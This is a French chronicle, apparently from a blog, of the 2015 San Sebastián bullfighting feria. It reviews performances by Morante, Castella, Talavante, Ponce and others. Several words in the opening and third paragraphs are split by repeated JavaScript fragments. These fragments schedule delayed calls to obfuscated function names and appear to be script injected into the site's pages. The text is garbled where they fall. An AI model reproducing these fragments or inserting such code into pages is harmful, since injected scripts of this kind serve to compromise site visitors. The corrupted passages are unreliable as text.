SAINT SEBASTIEN 2015, LA FERIA DU RETOUR

La Semana Grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande de San Sebastien après une mise en sommeil de deux ans renouait avec les toros cette année. Les aficionados seraient-ils fidèles après deux ans de rupture ? La concurrence de Dax, Bayonne, Madrid allait-elle peser ? La crise économique freinerait-elle la taquilla ? Les espoirs des antis allaient être déçus, Illumbe accueillant entre 30 et 35 000 spectateurs sur quatre jours selon le « Diario Vasco ».

Face à une corrida de Juan Pedro qui ne s’est dégonflée, Morante a délivré, le samedi, le meilleur de son art. A son premier passage, il fit une démonstration à la cape avec. Invité à saluer il s’y refusa. El de La Puebla fit un effort significatif mais son second toro ne lui permit pas de s’exprimer, malheureux à la mort, il répondit à une ovation qui fit trembler les murs.

Ce jour-là, Sébastien Castella coupa lui aussi une oreille avec forte pétition de la seconde. Deux grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes faenas pleines de maîtrise et de rigueur qui lui valurent justement « la Concha de oro » comme triomphateur de féria. Alejandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andro Talavante, brillant à la cape, original toujours et bon tueur pour une fois gagna lui aussi une récompense lors de cette tarde importante.

La veille, Pablo Hermoso de Mendoza, El Juli et Miguel Angel Perrera coupent un trophée et, le premier jour, devant Don Juan Carlos et les caméras de TVE, Ponce délivre son magister (une oreille).

Tous bien présentés, astifinos, les toros n’ont pas répondu, dans l’ensemble, aux attentes des aficionados. Le lot de Victorino, applaudi à sa sortie, sur la défensive, s’arrêta posant des problèmes insurmontables. Ce fut la déception de cette « féria du retour ».

 

Les commentaires sont fermés.